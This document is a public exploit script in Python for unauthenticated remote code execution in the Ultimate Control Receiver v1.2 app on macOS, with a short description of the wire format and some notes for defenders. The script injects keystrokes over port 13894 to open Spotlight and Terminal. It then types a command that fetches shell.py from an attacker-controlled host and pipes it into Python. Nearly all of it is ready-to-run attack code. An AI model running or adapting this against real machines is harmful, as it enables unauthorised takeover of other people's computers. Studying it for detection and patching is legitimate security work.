# Exploit Title: Ultimate Control Receiver (MacOS) v1.2 - Remote Code Execution
# Date: 4/08/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.negusoft.com/
# Software Link: https://www.negusoft.com/ucontrol/downloads/mac.html
# Version: 1.2
# Tested on: macOS 14.4 Sonoma

'''
Description:
Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code execution.
An attacker can exploit the keyboard input functionality over TCP to execute arbitrary
system commands on the target machine without user interaction.

Wire format as used by this script (every message is exactly 32 bytes):
  - bytes 0-1   : message type, written twice (3 = connection / handshake,
                  17 = key event, 18 = typed character)
  - byte 2      : modifier flags; 1 << 4 is set when the Command key is held
  - byte 3      : key action code, looked up as [0, 3, 1][action]
  - bytes 4-7   : big-endian uint32 key code or character code point
  - bytes 24-31 : big-endian uint64 wall-clock timestamp in milliseconds

Notes for defenders:
  - The receiver is driven over UDP and TCP on port 13894 and, per the
    description above, accepts these messages with no authentication; keeping
    that port off untrusted networks is the primary mitigation.
  - The traffic is distinctive: an unsolicited 32-byte UDP datagram beginning
    0x03 0x03, then a burst of short-lived TCP connections to the same port,
    each carrying a 32-byte payload beginning 0x11 0x11 or 0x12 0x12, one
    connection per typed character.
'''

import socket
import time
import struct

TARGET_IP = "192.168.1.143"   # receiver host (private-range address used by the author)
TARGET_PORT = 13894           # receiver port; used for both the UDP handshake and TCP input
LHOST = "192.168.1.63"        # host the final typed command fetches shell.py from

# Key codes placed in the uint32 field (bytes 4-7) of a key-event message.
COMMAND = 4194304   # 0x400000
SPACE = 32
ENTER = 13
F11 = 16777236      # 0x1000014


def create_connection_message() -> bytes:
    """Build the 32-byte UDP handshake message: type 3 in bytes 0-1, remaining bytes zero."""
    return bytes([3, 3] + [0]*30)


def create_type_char_message(char: str) -> bytearray:
    """Build a 32-byte typed-character message (type 18) carrying the code point of *char*.

    The code point goes into bytes 4-7 as a big-endian uint32 and the current
    time in milliseconds into bytes 24-31 as a big-endian uint64; all other
    bytes stay zero.
    """
    msg = bytearray(32)
    msg[0] = 18
    msg[1] = 18
    struct.pack_into(">I", msg, 4, ord(char))
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg


def send_udp_handshake() -> None:
    """Send the connection message to the receiver over UDP; the socket is closed either way."""
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        udp_sock.sendto(create_connection_message(), (TARGET_IP, TARGET_PORT))
    finally:
        udp_sock.close()


def send_char_over_tcp(char: str) -> None:
    """Open a new TCP connection (2 s timeout), send one typed-character message, close it."""
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.settimeout(2)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_type_char_message(char))
    finally:
        tcp_sock.close()


def send_string(text: str) -> None:
    """Type *text* one character per TCP connection, sleeping 1 s after each character."""
    for char in text:
        send_char_over_tcp(char)
        time.sleep(1)


def press_f11() -> None:
    """Press F11 key only.

    Sends the UDP handshake, waits 1 s, then on a single TCP connection sends
    an F11 key event with action 2 followed by action 1 (presumably press then
    release; the receiver's action semantics are not visible here).
    """
    send_udp_handshake()
    time.sleep(1)
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(F11, 2))
        tcp_sock.send(create_key_message(F11, 1))
    finally:
        tcp_sock.close()


def open_spotlight() -> None:
    """Send Command+Space as four key events (Command 2, Space 2, Space 1, Command 1).

    Every event has the Command modifier flag set. Preceded by the UDP
    handshake and a 1 s pause, all on one TCP connection.
    """
    send_udp_handshake()
    time.sleep(1)
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(COMMAND, 2, True))
        tcp_sock.send(create_key_message(SPACE, 2, True))
        tcp_sock.send(create_key_message(SPACE, 1, True))
        tcp_sock.send(create_key_message(COMMAND, 1, True))
    finally:
        tcp_sock.close()


def create_key_message(key_code: int, action: int, command: bool = False) -> bytearray:
    """Build a 32-byte key-event message (type 17).

    Args:
        key_code: value written to bytes 4-7 as a big-endian uint32.
        action: index into the action table [0, 3, 1]; only 0, 1 and 2 are
            valid, anything else raises IndexError.
        command: when True, bit 4 (1 << 4) of byte 2 is set.

    Returns:
        The message with the current time in milliseconds in bytes 24-31.
    """
    msg = bytearray(32)
    msg[0] = 17
    msg[1] = 17
    msg[2] = 1 << 4 if command else 0
    msg[3] = [0, 3, 1][action]
    struct.pack_into(">I", msg, 4, key_code)
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg


def main() -> None:
    """Run the full sequence: F11, Spotlight, type "terminal", Enter, type the command, Enter.

    The fixed sleeps between steps are the only synchronisation with the
    target's UI; nothing is read back from the receiver at any point.
    """
    print("Initial Access...")
    press_f11()
    time.sleep(5)
    print("Opening Spotlight...")
    open_spotlight()
    time.sleep(2)
    send_udp_handshake()
    time.sleep(1)
    print("Typing 'terminal'...")
    send_string("terminal")
    time.sleep(1)
    print("Pressing Enter...")
    # Enter is sent with action 0 on its own TCP connection.
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(ENTER, 0))
    finally:
        tcp_sock.close()
    # 10 s is allowed for Terminal to open and take focus before typing resumes.
    time.sleep(10)
    print("Executing payload...")
    # The typed line fetches shell.py from LHOST over plain HTTP and pipes it
    # into whichever python interpreter is found first; the receiver itself
    # only relays keystrokes.
    cmd = f"curl -s http://{LHOST}/shell.py | $(which python3 || which python)"
    send_string(cmd)
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(ENTER, 0))
    finally:
        tcp_sock.close()
    print("Operation complete")


if __name__ == "__main__":
    main()
    time.sleep(1)